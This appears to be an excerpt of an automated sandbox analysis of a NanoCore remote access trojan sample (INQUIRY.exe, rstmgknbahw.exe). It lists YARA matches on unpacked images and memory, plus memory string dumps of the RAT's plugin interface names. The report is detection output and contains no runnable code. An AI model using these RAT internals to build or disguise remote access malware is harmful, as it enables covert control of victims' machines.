      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: INQUIRY.exe, 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: INQUIRY.exe, 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: INQUIRY.exe, 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: INQUIRY.exe, 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: INQUIRY.exe, 00000002.00000002.918484295.0000000002911000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: INQUIRY.exe, 00000002.00000002.918484295.0000000002911000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: INQUIRY.exe, 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: INQUIRY.exe, 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: INQUIRY.exe, 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: rstmgknbahw.exe, 00000004.00000002.725133013.00000000028DE000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000004.00000002.725133013.00000000028DE000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: rstmgknbahw.exe, 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000006.00000002.734941801.00000000027AE000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000006.00000002.734941801.00000000027AE000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: rstmgknbahw.exe, 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: rstmgknbahw.exe, 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: rstmgknbahw.exe, 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
